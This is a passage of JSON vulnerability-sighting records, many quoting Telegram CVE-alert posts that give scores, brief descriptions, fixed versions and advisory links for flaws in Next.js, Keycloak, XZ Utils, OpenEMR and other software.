"a8032eac-e0c6-4cdd-a3ca-a48ea73107e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-562R-8445-54R2", "type": "published-proof-of-concept", "source": "Telegram/WQqRawnFxdQj2C7QSZvJhJYu2ip6AHddUppaVRsAsIpfVRo", "content": "", "creation_timestamp": "2026-01-10T08:01:06.000000Z"}, {"uuid": "1f537bec-d241-48ff-a059-e029098a716c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-223J-4RM8-MRMF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10140", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30218\n\ud83d\udd25 CVSS Score: 1.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: Next.js is a React framework for building full-stack web applications. To mitigate CVE-2025-29927, Next.js validated the x-middleware-subrequest-id which persisted across multiple incoming requests. However, this subrequest ID is sent to all requests, even if the destination is not the same host as the Next.js application. Initiating a fetch request to a third-party within Middleware will send the x-middleware-subrequest-id to that third party. This vulnerability is fixed in 12.3.6, 13.5.10, 14.2.26, and 15.2.4.\n\ud83d\udccf Published: 2025-04-02T21:23:14.660Z\n\ud83d\udccf Modified: 2025-04-02T21:23:14.660Z\n\ud83d\udd17 References:\n1. https://github.com/vercel/next.js/security/advisories/GHSA-223j-4rm8-mrmf\n2. https://vercel.com/changelog/cve-2025-30218-5DREmEH765PoeAsrNNQj3O", "creation_timestamp": "2025-04-02T21:34:07.000000Z"}, {"uuid": "e39c317b-a722-46ed-bf34-294ff819c97d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-252H-4J5Q-88PC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10145", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27608\n\ud83d\udd25 CVSS Score: 1 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: Arduino IDE 2.x is an IDE based on the Theia IDE framework and built with Electron. A Self Cross-Site Scripting (XSS) vulnerability has been identified within the Arduino-IDE prior to version v2.3.5. The vulnerability occurs in the Additional Board Manager URLs field, which can be found in the Preferences -&gt; Settings section of the Arduino IDE interface. In the vulnerable versions, any values entered in this field are directly displayed to the user through a notification tooltip object, without a proper output encoding routine, due to the underlying ElectronJS engine interpretation. This vulnerability exposes the input parameter to Self-XSS attacks, which may lead to security risks depending on where the malicious payload is injected. This vulnerability is fixed in 2.3.5.\n\ud83d\udccf Published: 2025-04-02T21:09:16.943Z\n\ud83d\udccf Modified: 2025-04-02T21:09:16.943Z\n\ud83d\udd17 References:\n1. https://github.com/arduino/arduino-ide/security/advisories/GHSA-252h-4j5q-88pc\n2. https://github.com/arduino/arduino-ide/commit/d298b3ffc94008e89066cd999d891e84190da18f", "creation_timestamp": "2025-04-02T21:34:15.000000Z"}, {"uuid": "e91ea460-957e-438c-a5e5-ef5a83e09c72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V3R5-PJPM-MWGQ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10319", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-0040\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: Versions of Async HTTP Client prior to 1.13.2 are vulnerable to a form of targeted request manipulation called CRLF injection. This vulnerability was the result of insufficient validation of HTTP header field values before sending them to the network. Users are vulnerable if they pass untrusted data into HTTP header field values without prior sanitisation. Common use-cases here might be to place usernames from a database into HTTP header fields. This vulnerability allows attackers to inject new HTTP header fields, or entirely new requests, into the data stream. This can cause requests to be understood very differently by the remote server than was intended. In general, this is unlikely to result in data disclosure, but it can result in a number of logical errors and other misbehaviours.\n\ud83d\udccf Published: 2023-01-18T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-03T19:28:55.800Z\n\ud83d\udd17 References:\n1. https://github.com/swift-server/async-http-client/security/advisories/GHSA-v3r5-pjpm-mwgq", "creation_timestamp": "2025-04-03T19:35:27.000000Z"}, {"uuid": "51182f48-6ffb-4630-a356-22e50f5e71cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7857", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/10160", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6291\n\ud83d\udd25 CVSS Score: 7.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L)\n\ud83d\udd39 Description: A flaw was found in the redirect_uri validation logic in Keycloak. This issue may allow a bypass of otherwise explicitly allowed hosts. A successful attack may lead to an access token being stolen, making it possible for the attacker to impersonate other users.\n\ud83d\udccf Published: 2024-01-26T14:23:43.185Z\n\ud83d\udccf Modified: 2025-04-03T02:35:28.214Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:7854\n2. https://access.redhat.com/errata/RHSA-2023:7855\n3. https://access.redhat.com/errata/RHSA-2023:7856\n4. https://access.redhat.com/errata/RHSA-2023:7857\n5. https://access.redhat.com/errata/RHSA-2023:7858\n6. https://access.redhat.com/errata/RHSA-2023:7860\n7. https://access.redhat.com/errata/RHSA-2023:7861\n8. https://access.redhat.com/errata/RHSA-2024:0798\n9. https://access.redhat.com/errata/RHSA-2024:0799\n10. https://access.redhat.com/errata/RHSA-2024:0800\n11. https://access.redhat.com/errata/RHSA-2024:0801\n12. https://access.redhat.com/errata/RHSA-2024:0804\n13. https://access.redhat.com/security/cve/CVE-2023-6291\n14. https://bugzilla.redhat.com/show_bug.cgi?id=2251407", "creation_timestamp": "2025-04-03T03:33:49.000000Z"}, {"uuid": "84269f36-0515-4065-b6dc-b908c7452d66", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7854", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/10160", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6291\n\ud83d\udd25 CVSS Score: 7.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L)\n\ud83d\udd39 Description: A flaw was found in the redirect_uri validation logic in Keycloak. This issue may allow a bypass of otherwise explicitly allowed hosts. A successful attack may lead to an access token being stolen, making it possible for the attacker to impersonate other users.\n\ud83d\udccf Published: 2024-01-26T14:23:43.185Z\n\ud83d\udccf Modified: 2025-04-03T02:35:28.214Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:7854\n2. https://access.redhat.com/errata/RHSA-2023:7855\n3. https://access.redhat.com/errata/RHSA-2023:7856\n4. https://access.redhat.com/errata/RHSA-2023:7857\n5. https://access.redhat.com/errata/RHSA-2023:7858\n6. https://access.redhat.com/errata/RHSA-2023:7860\n7. https://access.redhat.com/errata/RHSA-2023:7861\n8. https://access.redhat.com/errata/RHSA-2024:0798\n9. https://access.redhat.com/errata/RHSA-2024:0799\n10. https://access.redhat.com/errata/RHSA-2024:0800\n11. https://access.redhat.com/errata/RHSA-2024:0801\n12. https://access.redhat.com/errata/RHSA-2024:0804\n13. https://access.redhat.com/security/cve/CVE-2023-6291\n14. https://bugzilla.redhat.com/show_bug.cgi?id=2251407", "creation_timestamp": "2025-04-03T03:33:49.000000Z"}, {"uuid": "aa712033-69fa-42bc-be95-e3a8573042c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7858", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/10160", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6291\n\ud83d\udd25 CVSS Score: 7.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L)\n\ud83d\udd39 Description: A flaw was found in the redirect_uri validation logic in Keycloak. This issue may allow a bypass of otherwise explicitly allowed hosts. A successful attack may lead to an access token being stolen, making it possible for the attacker to impersonate other users.\n\ud83d\udccf Published: 2024-01-26T14:23:43.185Z\n\ud83d\udccf Modified: 2025-04-03T02:35:28.214Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:7854\n2. https://access.redhat.com/errata/RHSA-2023:7855\n3. https://access.redhat.com/errata/RHSA-2023:7856\n4. https://access.redhat.com/errata/RHSA-2023:7857\n5. https://access.redhat.com/errata/RHSA-2023:7858\n6. https://access.redhat.com/errata/RHSA-2023:7860\n7. https://access.redhat.com/errata/RHSA-2023:7861\n8. https://access.redhat.com/errata/RHSA-2024:0798\n9. https://access.redhat.com/errata/RHSA-2024:0799\n10. https://access.redhat.com/errata/RHSA-2024:0800\n11. https://access.redhat.com/errata/RHSA-2024:0801\n12. https://access.redhat.com/errata/RHSA-2024:0804\n13. https://access.redhat.com/security/cve/CVE-2023-6291\n14. https://bugzilla.redhat.com/show_bug.cgi?id=2251407", "creation_timestamp": "2025-04-03T03:33:49.000000Z"}, {"uuid": "8a123660-aea0-49d2-a8d9-ec89ee1e1ae3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0798", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/10160", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6291\n\ud83d\udd25 CVSS Score: 7.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L)\n\ud83d\udd39 Description: A flaw was found in the redirect_uri validation logic in Keycloak. This issue may allow a bypass of otherwise explicitly allowed hosts. A successful attack may lead to an access token being stolen, making it possible for the attacker to impersonate other users.\n\ud83d\udccf Published: 2024-01-26T14:23:43.185Z\n\ud83d\udccf Modified: 2025-04-03T02:35:28.214Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:7854\n2. https://access.redhat.com/errata/RHSA-2023:7855\n3. https://access.redhat.com/errata/RHSA-2023:7856\n4. https://access.redhat.com/errata/RHSA-2023:7857\n5. https://access.redhat.com/errata/RHSA-2023:7858\n6. https://access.redhat.com/errata/RHSA-2023:7860\n7. https://access.redhat.com/errata/RHSA-2023:7861\n8. https://access.redhat.com/errata/RHSA-2024:0798\n9. https://access.redhat.com/errata/RHSA-2024:0799\n10. https://access.redhat.com/errata/RHSA-2024:0800\n11. https://access.redhat.com/errata/RHSA-2024:0801\n12. https://access.redhat.com/errata/RHSA-2024:0804\n13. https://access.redhat.com/security/cve/CVE-2023-6291\n14. https://bugzilla.redhat.com/show_bug.cgi?id=2251407", "creation_timestamp": "2025-04-03T03:33:49.000000Z"}, {"uuid": "32e59103-afd4-46bb-a14d-1564d3a2cfac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0804", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/10160", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6291\n\ud83d\udd25 CVSS Score: 7.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L)\n\ud83d\udd39 Description: A flaw was found in the redirect_uri validation logic in Keycloak. This issue may allow a bypass of otherwise explicitly allowed hosts. A successful attack may lead to an access token being stolen, making it possible for the attacker to impersonate other users.\n\ud83d\udccf Published: 2024-01-26T14:23:43.185Z\n\ud83d\udccf Modified: 2025-04-03T02:35:28.214Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:7854\n2. https://access.redhat.com/errata/RHSA-2023:7855\n3. https://access.redhat.com/errata/RHSA-2023:7856\n4. https://access.redhat.com/errata/RHSA-2023:7857\n5. https://access.redhat.com/errata/RHSA-2023:7858\n6. https://access.redhat.com/errata/RHSA-2023:7860\n7. https://access.redhat.com/errata/RHSA-2023:7861\n8. https://access.redhat.com/errata/RHSA-2024:0798\n9. https://access.redhat.com/errata/RHSA-2024:0799\n10. https://access.redhat.com/errata/RHSA-2024:0800\n11. https://access.redhat.com/errata/RHSA-2024:0801\n12. https://access.redhat.com/errata/RHSA-2024:0804\n13. https://access.redhat.com/security/cve/CVE-2023-6291\n14. https://bugzilla.redhat.com/show_bug.cgi?id=2251407", "creation_timestamp": "2025-04-03T03:33:49.000000Z"}, {"uuid": "232f0499-5ead-42be-ae21-436f987ab7ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7856", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/10160", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6291\n\ud83d\udd25 CVSS Score: 7.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L)\n\ud83d\udd39 Description: A flaw was found in the redirect_uri validation logic in Keycloak. This issue may allow a bypass of otherwise explicitly allowed hosts. A successful attack may lead to an access token being stolen, making it possible for the attacker to impersonate other users.\n\ud83d\udccf Published: 2024-01-26T14:23:43.185Z\n\ud83d\udccf Modified: 2025-04-03T02:35:28.214Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:7854\n2. https://access.redhat.com/errata/RHSA-2023:7855\n3. https://access.redhat.com/errata/RHSA-2023:7856\n4. https://access.redhat.com/errata/RHSA-2023:7857\n5. https://access.redhat.com/errata/RHSA-2023:7858\n6. https://access.redhat.com/errata/RHSA-2023:7860\n7. https://access.redhat.com/errata/RHSA-2023:7861\n8. https://access.redhat.com/errata/RHSA-2024:0798\n9. https://access.redhat.com/errata/RHSA-2024:0799\n10. https://access.redhat.com/errata/RHSA-2024:0800\n11. https://access.redhat.com/errata/RHSA-2024:0801\n12. https://access.redhat.com/errata/RHSA-2024:0804\n13. https://access.redhat.com/security/cve/CVE-2023-6291\n14. https://bugzilla.redhat.com/show_bug.cgi?id=2251407", "creation_timestamp": "2025-04-03T03:33:49.000000Z"}, {"uuid": "990f6f98-677b-4b81-b0c3-b42cd93b96d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0801", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/10160", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6291\n\ud83d\udd25 CVSS Score: 7.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L)\n\ud83d\udd39 Description: A flaw was found in the redirect_uri validation logic in Keycloak. This issue may allow a bypass of otherwise explicitly allowed hosts. A successful attack may lead to an access token being stolen, making it possible for the attacker to impersonate other users.\n\ud83d\udccf Published: 2024-01-26T14:23:43.185Z\n\ud83d\udccf Modified: 2025-04-03T02:35:28.214Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:7854\n2. https://access.redhat.com/errata/RHSA-2023:7855\n3. https://access.redhat.com/errata/RHSA-2023:7856\n4. https://access.redhat.com/errata/RHSA-2023:7857\n5. https://access.redhat.com/errata/RHSA-2023:7858\n6. https://access.redhat.com/errata/RHSA-2023:7860\n7. https://access.redhat.com/errata/RHSA-2023:7861\n8. https://access.redhat.com/errata/RHSA-2024:0798\n9. https://access.redhat.com/errata/RHSA-2024:0799\n10. https://access.redhat.com/errata/RHSA-2024:0800\n11. https://access.redhat.com/errata/RHSA-2024:0801\n12. https://access.redhat.com/errata/RHSA-2024:0804\n13. https://access.redhat.com/security/cve/CVE-2023-6291\n14. https://bugzilla.redhat.com/show_bug.cgi?id=2251407", "creation_timestamp": "2025-04-03T03:33:49.000000Z"}, {"uuid": "f04e9245-46e2-4ded-9703-6c9ba4e77aca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F42F-6FVV-XQX3", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10639", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-2260\n\ud83d\udd25 CVSS Score: 7.1 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: In NetX HTTP server functionality of Eclipse ThreadX NetX Duo before \nversion 6.4.3, an attacker can cause a denial of service by specially \ncrafted packets. The core issue is missing closing of a file in case of \nan error condition, resulting in the 404 error for each further file \nrequest. Users can work-around the issue by disabling the PUT request \nsupport.\n\n\n\n\nThis issue follows an incomplete fix of CVE-2025-0726.\n\ud83d\udccf Published: 2025-04-06T18:56:34.730Z\n\ud83d\udccf Modified: 2025-04-06T18:56:34.730Z\n\ud83d\udd17 References:\n1. https://github.com/eclipse-threadx/netxduo/commit/fb3195bbb6d0d6fe71a7a19585c008623c217f9e\n2. https://github.com/eclipse-threadx/netxduo/security/advisories/GHSA-f42f-6fvv-xqx3", "creation_timestamp": "2025-04-06T19:44:13.000000Z"}, {"uuid": "c994fb83-8c63-400f-97c7-c9c9854460d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0800", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/10160", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6291\n\ud83d\udd25 CVSS Score: 7.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L)\n\ud83d\udd39 Description: A flaw was found in the redirect_uri validation logic in Keycloak. This issue may allow a bypass of otherwise explicitly allowed hosts. A successful attack may lead to an access token being stolen, making it possible for the attacker to impersonate other users.\n\ud83d\udccf Published: 2024-01-26T14:23:43.185Z\n\ud83d\udccf Modified: 2025-04-03T02:35:28.214Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:7854\n2. https://access.redhat.com/errata/RHSA-2023:7855\n3. https://access.redhat.com/errata/RHSA-2023:7856\n4. https://access.redhat.com/errata/RHSA-2023:7857\n5. https://access.redhat.com/errata/RHSA-2023:7858\n6. https://access.redhat.com/errata/RHSA-2023:7860\n7. https://access.redhat.com/errata/RHSA-2023:7861\n8. https://access.redhat.com/errata/RHSA-2024:0798\n9. https://access.redhat.com/errata/RHSA-2024:0799\n10. https://access.redhat.com/errata/RHSA-2024:0800\n11. https://access.redhat.com/errata/RHSA-2024:0801\n12. https://access.redhat.com/errata/RHSA-2024:0804\n13. https://access.redhat.com/security/cve/CVE-2023-6291\n14. https://bugzilla.redhat.com/show_bug.cgi?id=2251407", "creation_timestamp": "2025-04-03T03:33:49.000000Z"}, {"uuid": "19749755-78ad-42d0-9466-11884fab6824", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0799", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/10160", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6291\n\ud83d\udd25 CVSS Score: 7.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L)\n\ud83d\udd39 Description: A flaw was found in the redirect_uri validation logic in Keycloak. This issue may allow a bypass of otherwise explicitly allowed hosts. A successful attack may lead to an access token being stolen, making it possible for the attacker to impersonate other users.\n\ud83d\udccf Published: 2024-01-26T14:23:43.185Z\n\ud83d\udccf Modified: 2025-04-03T02:35:28.214Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:7854\n2. https://access.redhat.com/errata/RHSA-2023:7855\n3. https://access.redhat.com/errata/RHSA-2023:7856\n4. https://access.redhat.com/errata/RHSA-2023:7857\n5. https://access.redhat.com/errata/RHSA-2023:7858\n6. https://access.redhat.com/errata/RHSA-2023:7860\n7. https://access.redhat.com/errata/RHSA-2023:7861\n8. https://access.redhat.com/errata/RHSA-2024:0798\n9. https://access.redhat.com/errata/RHSA-2024:0799\n10. https://access.redhat.com/errata/RHSA-2024:0800\n11. https://access.redhat.com/errata/RHSA-2024:0801\n12. https://access.redhat.com/errata/RHSA-2024:0804\n13. https://access.redhat.com/security/cve/CVE-2023-6291\n14. https://bugzilla.redhat.com/show_bug.cgi?id=2251407", "creation_timestamp": "2025-04-03T03:33:49.000000Z"}, {"uuid": "3a121e96-163f-43c2-a070-0d0bddbec591", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6CC8-P5MM-29W2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10291", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31115\n\ud83d\udd25 CVSS Score: 8.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: XZ Utils provide a general-purpose data-compression library plus command-line tools. In XZ Utils 5.3.3alpha to 5.8.0, the multithreaded .xz decoder in liblzma has a bug where invalid input can at least result in a crash. The effects include heap use after free and writing to an address based on the null pointer plus an offset. Applications and libraries that use the lzma_stream_decoder_mt function are affected. The bug has been fixed in XZ Utils 5.8.1, and the fix has been committed to the v5.4, v5.6, v5.8, and master branches in the xz Git repository. No new release packages will be made from the old stable branches, but a standalone patch is available that applies to all affected releases.\n\ud83d\udccf Published: 2025-04-03T16:57:05.488Z\n\ud83d\udccf Modified: 2025-04-03T16:57:05.488Z\n\ud83d\udd17 References:\n1. https://github.com/tukaani-project/xz/security/advisories/GHSA-6cc8-p5mm-29w2\n2. https://github.com/tukaani-project/xz/commit/d5a2ffe41bb77b918a8c96084885d4dbe4bf6480\n3. https://tukaani.org/xz/xz-cve-2025-31115.patch", "creation_timestamp": "2025-04-03T17:35:49.000000Z"}, {"uuid": "878ae3c9-c05e-4d5e-a84a-ed5624d552e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-59RV-645X-RG6P", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9695", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30161\n\ud83d\udd25 CVSS Score: 8.4 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: OpenEMR is a free and open source electronic health records and medical practice management application. A stored XSS vulnerability in the Bronchitis form component of OpenEMR allows anyone who is able to edit a bronchitis form to steal credentials from administrators. This vulnerability is fixed in 7.0.3.\n\ud83d\udccf Published: 2025-03-31T16:12:29.064Z\n\ud83d\udccf Modified: 2025-03-31T16:12:29.064Z\n\ud83d\udd17 References:\n1. https://github.com/openemr/openemr/security/advisories/GHSA-59rv-645x-rg6p\n2. https://github.com/openemr/openemr/blob/17ca5539bafcdc25a9042ebc14480552e07867e4/interface/forms/bronchitis/view.php#L102-L103\n3. https://github.com/openemr/openemr/blob/17ca5539bafcdc25a9042ebc14480552e07867e4/interface/forms/bronchitis/view.php#L303-L304", "creation_timestamp": "2025-03-31T16:33:19.000000Z"}, {"uuid": "b428ffd1-037e-4400-a38a-ab4be2336b15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W34W-FVP3-68XM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9944", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31131\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)\n\ud83d\udd39 Description: YesWiki is a wiki system written in PHP. The squelette parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server. This vulnerability is fixed in 4.5.2.\n\ud83d\udccf Published: 2025-04-01T14:56:45.222Z\n\ud83d\udccf Modified: 2025-04-01T16:11:20.111Z\n\ud83d\udd17 References:\n1. https://github.com/YesWiki/yeswiki/security/advisories/GHSA-w34w-fvp3-68xm\n2. https://github.com/YesWiki/yeswiki/commit/f78c915369a60c74ab8f38561ae93a4aaca9b989", "creation_timestamp": "2025-04-01T16:32:25.000000Z"}, {"uuid": "7a8ff185-ed96-4270-8b23-05c934822184", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2G22-WG49-FGV5", "type": "published-proof-of-concept", "source": "Telegram/UDMk206lgQvLt4zm60yBzpmxh6GeqSRvdRaLpn90JAOiIEo", "content": "", "creation_timestamp": "2026-01-10T05:02:58.000000Z"}, {"uuid": "272a3579-8f51-4ad0-955d-72625ec4e90a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GXXC-M74C-F48X", "type": "published-proof-of-concept", "source": "Telegram/UDMk206lgQvLt4zm60yBzpmxh6GeqSRvdRaLpn90JAOiIEo", "content": "", "creation_timestamp": "2026-01-10T05:02:58.000000Z"}, {"uuid": "538d9d51-3972-4c2f-aab6-30675553a136", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FQXC-CXPH-9VQ8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9911", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30210\n\ud83d\udd25 CVSS Score: 8.7 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: Bruno is an open source IDE for exploring and testing APIs. Prior to 1.39.1, the custom tool-tip components which internally use react-tooltip were setting the content (in this case the Environment name) as raw HTML which then gets injected into DOM on hover. This, combined with loose Content Security Policy restrictions, allowed any valid HTML text containing inline script to get executed on hovering over the respective Environment's name. This vulnerability's attack surface is limited strictly to scenarios where users import collections from untrusted or malicious sources. The exploit requires deliberate action from the user\u2014specifically, downloading and opening an externally provided malicious Bruno or Postman collection export and the user hovers on the environment name. This vulnerability is fixed in 1.39.1.\n\ud83d\udccf Published: 2025-04-01T14:16:57.897Z\n\ud83d\udccf Modified: 2025-04-01T14:16:57.897Z\n\ud83d\udd17 References:\n1. https://github.com/usebruno/bruno/security/advisories/GHSA-fqxc-cxph-9vq8", "creation_timestamp": "2025-04-01T14:33:12.000000Z"}, {"uuid": "2180cac0-3290-48ba-8950-4bb54aa60ea0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7855", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/10160", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6291\n\ud83d\udd25 CVSS Score: 7.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L)\n\ud83d\udd39 Description: A flaw was found in the redirect_uri validation logic in Keycloak. This issue may allow a bypass of otherwise explicitly allowed hosts. A 